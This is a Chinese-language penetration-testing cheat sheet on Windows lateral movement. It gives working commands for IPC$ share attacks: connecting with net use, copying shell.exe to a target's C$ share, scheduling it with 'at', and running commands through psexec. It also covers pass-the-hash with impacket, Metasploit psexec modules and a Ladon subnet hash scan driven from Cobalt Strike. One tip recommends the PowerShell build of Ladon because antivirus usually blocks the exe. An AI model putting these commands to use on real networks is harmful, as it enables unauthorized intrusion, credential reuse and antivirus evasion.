IPC攻击
IPC共享 管道命令 的资源,实现进程间的资源共享,可以进行命令执行
139:文件传输(2008以后弃用)
445:身份认证(主要)
| 说明 | |
|---|---|
net use \\_ip\ipc$ _pass /user:_name |
建立连接 |
| net use | 查看当前连接 |
| 使用 | 复制xxx到目标c盘www目录下: copy xxx \_ip\c$\www 常用命令 : dir、copy、at、move、rename dir \\_ip\c$ 查看c盘文件 net time \\_ip 查看时间 copy shell.exe \\_ip\c$\ 复制到c盘 at \\_ip 19:18:00 c:\shell.exe 计划任务 |
net share ipc$ /del |
删除连接 |
| 工具 | pstools 微软官方集成的命令工具集 psexec.exe /accepteula \\_ip 不弹窗执行IPC命令 |
哈希传递(PTH)
hash加密过程:明文 -> hex -> unicode -> md4
身份认证过程中,没有使用明文密码验证,而是hash验证,只要获取hash值,可以直接使用hash进行身份验证。
注意:2003和2008+的hash不同(相同明文加密方式不同,不可通用)
哈希登录工具:
cs、msf、impacket、mimikatz、ladon等
使用前提:
445处于开启状态(批量扫描445端口主机)
impacket(单个):
注:
cs中targets中右击也是单个传递(也可多选进行传递,但是会卡死,强烈不推荐!!!)
python版本:https://github.com/SecureAuthCorp/impacket
windows版本:https://github.com/maaaaz/impacket-examples-windows
使用:
psexec.exe _user:_pass@_ip cmd # 密码登录
psexec.exe -hashes _hash _user@_ip cmd # hash登录
注:
pth(pass the hash)限制 sid 501 administrator才可以hash登录
2003/xp/2008 没有kb2871997补丁 任何用户都可以进行pth
最后全部使用管理员账户的hash进行传递攻击
msf psexec模块
auxiliary/admin/smb/psexec_command # 执行单个命令的PTH模块
exploit/windows/smb/psexec # 执行直接就获取到meterpreter的PTH模块
exploit/windows/smb/psexec_psh # 支持对一个网段进行PTH进行验证的模块
Ladon
user.txt放用户名
pass.txt放32+32位hash
命令
shell c:\windows\Landon.exe 192.168.21.12/24 SmbHashScan
注意:
exe版本ladon大概率被杀软拦截,建议换成ps1的powershell版本
(user.txt和pass.txt设置与exe相同)
shell powershell.exe Import-Module Ladon7.ps1;Ladon smbhashscan